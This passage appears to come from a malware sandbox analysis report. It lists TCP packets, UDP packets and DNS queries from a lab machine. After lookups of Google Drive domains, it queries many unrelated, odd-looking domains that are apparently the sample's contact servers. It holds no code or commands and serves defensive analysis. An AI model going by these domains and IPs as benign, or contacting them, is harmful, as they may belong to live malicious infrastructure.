                                                                        May 22, 2024 17:36:32.703677893 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.703690052 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.703826904 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.704150915 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.704216003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.704432964 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.704741955 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.704790115 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.704921961 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.705390930 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.705513954 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.705676079 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.706368923 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706489086 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706653118 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.706768990 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706835032 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706975937 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.707298040 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.707350969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.707521915 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.707824945 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.707946062 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.708179951 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.708487034 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.708539009 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.708692074 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.709032059 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.709161997 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.709355116 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.709762096 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.709878922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.710122108 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.710346937 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.710400105 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.710598946 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.710918903 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.711064100 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.711313963 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.711632967 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.711684942 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712160110 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712176085 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.712214947 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712451935 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.712743998 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712795973 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.713046074 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.713402987 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.713510036 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.713722944 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.714029074 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.714082003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.714217901 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.714823008 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.714927912 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.715111971 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.715286970 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.715413094 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.715621948 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.716074944 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716190100 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716365099 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.716552019 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716670990 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716819048 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.717264891 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.717318058 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.717582941 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.717905045 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718024015 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718260050 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.718565941 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718682051 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718921900 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.719368935 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.719423056 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.719660997 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.044534922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.044552088 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.044735909 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.045144081 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045159101 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045383930 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.045548916 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045664072 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045888901 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.046132088 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046148062 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046291113 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.046725035 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046840906 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046972036 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.047341108 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.047354937 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.047557116 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.047946930 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.047962904 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.048167944 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.048412085 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049000978 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049122095 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049225092 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.049309969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049417973 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049499035 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.049707890 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049724102 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049962997 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.049967051 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049979925 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050189972 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.050420046 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050472021 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050585985 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.050637960 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050733089 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050852060 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.051049948 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051063061 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051235914 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.051392078 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051443100 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051632881 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051657915 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.051763058 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051886082 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.052052975 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052109003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052272081 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.052336931 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052495956 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052577972 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.052757025 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052808046 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052978992 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.053004026 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053128958 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053220034 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.053453922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053467989 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053641081 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.053697109 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053747892 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053881884 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.054106951 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054120064 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054246902 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.054348946 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054477930 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054542065 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.054860115 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054909945 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055071115 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.055109024 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055197954 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055286884 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.055505037 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055629015 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055670023 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.055773973 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055864096 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055942059 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.056237936 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056288958 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056449890 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.056554079 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056652069 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056747913 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.056885004 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056930065 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057190895 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.057241917 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057365894 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057419062 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.057617903 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057702065 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057813883 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.057876110 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057921886 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058099985 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.058301926 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058315039 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058408022 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.058533907 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058661938 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058737993 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.058914900 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058964968 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059170008 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.059225082 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059322119 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059438944 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.059602022 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059652090 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059812069 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.059848070 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059986115 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060154915 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.060270071 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060281992 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060532093 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.060636997 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060648918 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060777903 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.060973883 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061028957 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061160088 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.061264038 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061379910 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061480045 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.061630011 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061682940 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061844110 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.061963081 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.062045097 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.062143087 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.062442064 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.062702894 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.065505981 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.414258003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:38.267693043 CEST4985480192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:38.703464985 CEST804985435.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:38.703811884 CEST4985480192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:38.705823898 CEST4985480192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:39.141520977 CEST804985435.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:39.141860962 CEST804985435.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:39.142127037 CEST4985480192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:40.216470003 CEST4985480192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:40.652158022 CEST804985435.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:41.234746933 CEST4985580192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:41.666610003 CEST804985535.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:41.666748047 CEST4985580192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:41.668322086 CEST4985580192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:42.099977970 CEST804985535.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:42.100586891 CEST804985535.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:42.100790024 CEST4985580192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:43.184573889 CEST4985580192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:43.616282940 CEST804985535.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:44.202759981 CEST4985680192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:44.638776064 CEST804985635.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:44.638957977 CEST4985680192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:44.641021013 CEST4985680192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:45.076857090 CEST804985635.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:45.077999115 CEST804985635.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:45.078157902 CEST4985680192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:46.152621984 CEST4985680192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:46.588419914 CEST804985635.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:47.170640945 CEST4985780192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:47.602643013 CEST804985735.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:47.602842093 CEST4985780192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:47.604533911 CEST4985780192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:48.036195040 CEST804985735.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:48.036705017 CEST804985735.213.232.35192.168.11.30
                                                                        May 22, 2024 17:36:48.036952972 CEST4985780192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:48.037765026 CEST4985780192.168.11.3035.213.232.35
                                                                        May 22, 2024 17:36:48.469307899 CEST804985735.213.232.35192.168.11.30

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 22, 2024 17:30:27.462378979 CEST6058753192.168.11.301.1.1.1
                                                                        May 22, 2024 17:30:27.638328075 CEST53605871.1.1.1192.168.11.30
                                                                        May 22, 2024 17:30:28.463426113 CEST5461453192.168.11.301.1.1.1
                                                                        May 22, 2024 17:30:28.640177011 CEST53546141.1.1.1192.168.11.30
                                                                        May 22, 2024 17:31:11.690676928 CEST5789553192.168.11.301.1.1.1
                                                                        May 22, 2024 17:31:11.952263117 CEST53578951.1.1.1192.168.11.30
                                                                        May 22, 2024 17:31:27.649025917 CEST6529853192.168.11.301.1.1.1
                                                                        May 22, 2024 17:31:27.832376957 CEST53652981.1.1.1192.168.11.30
                                                                        May 22, 2024 17:31:44.442086935 CEST6119353192.168.11.301.1.1.1
                                                                        May 22, 2024 17:31:44.648138046 CEST53611931.1.1.1192.168.11.30
                                                                        May 22, 2024 17:31:52.706341028 CEST5946153192.168.11.301.1.1.1
                                                                        May 22, 2024 17:31:52.994199991 CEST53594611.1.1.1192.168.11.30
                                                                        May 22, 2024 17:32:06.625180960 CEST5249453192.168.11.301.1.1.1
                                                                        May 22, 2024 17:32:07.637701988 CEST5249453192.168.11.309.9.9.9
                                                                        May 22, 2024 17:32:08.466856956 CEST53524949.9.9.9192.168.11.30
                                                                        May 22, 2024 17:32:09.311559916 CEST53524941.1.1.1192.168.11.30
                                                                        May 22, 2024 17:32:11.512964010 CEST5549253192.168.11.309.9.9.9
                                                                        May 22, 2024 17:32:11.688114882 CEST53554929.9.9.9192.168.11.30
                                                                        May 22, 2024 17:32:16.701116085 CEST5132953192.168.11.309.9.9.9
                                                                        May 22, 2024 17:32:16.876611948 CEST53513299.9.9.9192.168.11.30
                                                                        May 22, 2024 17:32:24.933557987 CEST6148653192.168.11.309.9.9.9
                                                                        May 22, 2024 17:32:25.136393070 CEST53614869.9.9.9192.168.11.30
                                                                        May 22, 2024 17:32:38.837137938 CEST5751853192.168.11.309.9.9.9
                                                                        May 22, 2024 17:32:39.014173031 CEST53575189.9.9.9192.168.11.30
                                                                        May 22, 2024 17:32:47.069300890 CEST5755253192.168.11.309.9.9.9
                                                                        May 22, 2024 17:32:47.483016014 CEST53575529.9.9.9192.168.11.30
                                                                        May 22, 2024 17:33:02.206578016 CEST5662453192.168.11.309.9.9.9
                                                                        May 22, 2024 17:33:03.049319029 CEST53566249.9.9.9192.168.11.30
                                                                        May 22, 2024 17:33:16.703155041 CEST5818653192.168.11.309.9.9.9
                                                                        May 22, 2024 17:33:17.094779015 CEST53581869.9.9.9192.168.11.30
                                                                        May 22, 2024 17:33:32.840384960 CEST4933253192.168.11.309.9.9.9
                                                                        May 22, 2024 17:33:33.390373945 CEST53493329.9.9.9192.168.11.30
                                                                        May 22, 2024 17:33:41.447345018 CEST6199153192.168.11.309.9.9.9
                                                                        May 22, 2024 17:33:42.109771967 CEST53619919.9.9.9192.168.11.30
                                                                        May 22, 2024 17:33:56.460125923 CEST6310253192.168.11.309.9.9.9
                                                                        May 22, 2024 17:33:56.689013004 CEST53631029.9.9.9192.168.11.30
                                                                        May 22, 2024 17:34:04.755738974 CEST5709053192.168.11.309.9.9.9
                                                                        May 22, 2024 17:34:05.118482113 CEST53570909.9.9.9192.168.11.30
                                                                        May 22, 2024 17:34:20.220042944 CEST6202253192.168.11.309.9.9.9
                                                                        May 22, 2024 17:34:20.397764921 CEST53620229.9.9.9192.168.11.30
                                                                        May 22, 2024 17:34:53.601568937 CEST6309053192.168.11.309.9.9.9
                                                                        May 22, 2024 17:34:53.777906895 CEST53630909.9.9.9192.168.11.30
                                                                        May 22, 2024 17:35:15.424696922 CEST6435753192.168.11.309.9.9.9
                                                                        May 22, 2024 17:35:15.599873066 CEST53643579.9.9.9192.168.11.30
                                                                        May 22, 2024 17:35:23.657128096 CEST4999353192.168.11.309.9.9.9
                                                                        May 22, 2024 17:35:23.832480907 CEST53499939.9.9.9192.168.11.30
                                                                        May 22, 2024 17:35:45.605555058 CEST6210353192.168.11.309.9.9.9
                                                                        May 22, 2024 17:35:45.780750036 CEST53621039.9.9.9192.168.11.30
                                                                        May 22, 2024 17:36:38.079437017 CEST5545653192.168.11.309.9.9.9
                                                                        May 22, 2024 17:36:38.265254021 CEST53554569.9.9.9192.168.11.30
                                                                        May 22, 2024 17:36:53.045317888 CEST6158753192.168.11.309.9.9.9
                                                                        May 22, 2024 17:36:53.538935900 CEST53615879.9.9.9192.168.11.30
                                                                        May 22, 2024 17:38:26.429601908 CEST6146853192.168.11.309.9.9.9
                                                                        May 22, 2024 17:38:27.003089905 CEST53614689.9.9.9192.168.11.30

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        May 22, 2024 17:30:27.462378979 CEST192.168.11.301.1.1.10x122Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:30:28.463426113 CEST192.168.11.301.1.1.10xb083Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:11.690676928 CEST192.168.11.301.1.1.10x8a05Standard query (0)www.l7aeh.usA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:27.649025917 CEST192.168.11.301.1.1.10x8dd9Standard query (0)www.tycent520test.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:44.442086935 CEST192.168.11.301.1.1.10x4933Standard query (0)www.baronbubbol.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:52.706341028 CEST192.168.11.301.1.1.10x7c84Standard query (0)www.century21morenoycia.mxA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:06.625180960 CEST192.168.11.301.1.1.10x9914Standard query (0)www.vcayy.topA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:07.637701988 CEST192.168.11.309.9.9.90x9914Standard query (0)www.vcayy.topA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:11.512964010 CEST192.168.11.309.9.9.90x5cbbStandard query (0)www.vcayy.topA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:16.701116085 CEST192.168.11.309.9.9.90x2192Standard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:24.933557987 CEST192.168.11.309.9.9.90xd44dStandard query (0)www.facesofhoustontx.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:38.837137938 CEST192.168.11.309.9.9.90xa337Standard query (0)www.babyunitz.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:47.069300890 CEST192.168.11.309.9.9.90x890dStandard query (0)www.cngdesk.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:02.206578016 CEST192.168.11.309.9.9.90x4074Standard query (0)www.shortfox.topA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:16.703155041 CEST192.168.11.309.9.9.90xe3f5Standard query (0)www.ng-bo.onlineA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:32.840384960 CEST192.168.11.309.9.9.90x463bStandard query (0)www.86597.vipA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:41.447345018 CEST192.168.11.309.9.9.90x38ecStandard query (0)www.curty.seA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:56.460125923 CEST192.168.11.309.9.9.90x3a15Standard query (0)www.vicenc39-ns.storeA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:34:04.755738974 CEST192.168.11.309.9.9.90x99a1Standard query (0)www.beersekes.comA (IP address)IN (0x0001)false
